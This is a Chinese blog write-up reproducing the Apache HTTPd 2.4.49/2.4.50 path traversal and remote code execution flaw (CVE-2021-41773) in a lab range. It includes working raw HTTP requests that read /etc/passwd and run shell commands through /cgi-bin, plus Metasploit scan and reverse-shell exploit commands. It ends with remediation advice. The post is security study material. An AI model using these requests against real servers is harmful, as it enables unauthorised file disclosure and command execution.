apache-cve_2021_41773 复现


所有文章,仅供安全研究与学习之用,后果自负!

apache-cve_2021_41773 复现

Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。

0x01 漏洞描述

2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。

指纹:

app:“apache web server 2.4.49 2.4.50”

0x02 影响范围

Apache HTTPd 2.4.49/2.4.50版本

0x03 漏洞复现

靶场主页

在这里插入图片描述

手工复现

(1)文件读取

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

burp抓包 发送如下请求包

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 118.193.36.37:53238
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 09 Oct 2021 03:58:16 GMT
If-None-Match: "29cd-5cde381698600-gzip"
Cache-Control: max-age=0


在这里插入图片描述

(2) rce 命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 118.193.36.37:53238
Content-Type: text/plain
Content-Length: 8

echo; id

在这里插入图片描述
执行成功

ls /tmp
在这里插入图片描述

msf复现

脚本路径
在这里插入图片描述

(1)扫描是否存在

use auxiliary/linux/http/apache_normalize_path
set rhosts 192.168.157.129
set rport 8080
set SSL false
run

执行发现存在
在这里插入图片描述
(2) 漏洞利用 exploit 模块

use exploit/linux/http/apache_normalize_path_rce`
set RHOSTS 192.168.157.129
set RPORT 8080
set SSL false
set LHOST 192.168.157.137
set VERBOSE true
run

在这里插入图片描述

在线靶场和docker环境都
返回shell失败

以后再试吧

0x04 漏洞修复

1、若低于 2.4.49版本,可不升级。
2、若Apache HTTPd为 2.4.49版本与Apache HTTPd 2.4.50 ,请尽快升级至最新版本。

猜你喜欢

转载自blog.csdn.net/YouthBelief/article/details/121163859
今日推荐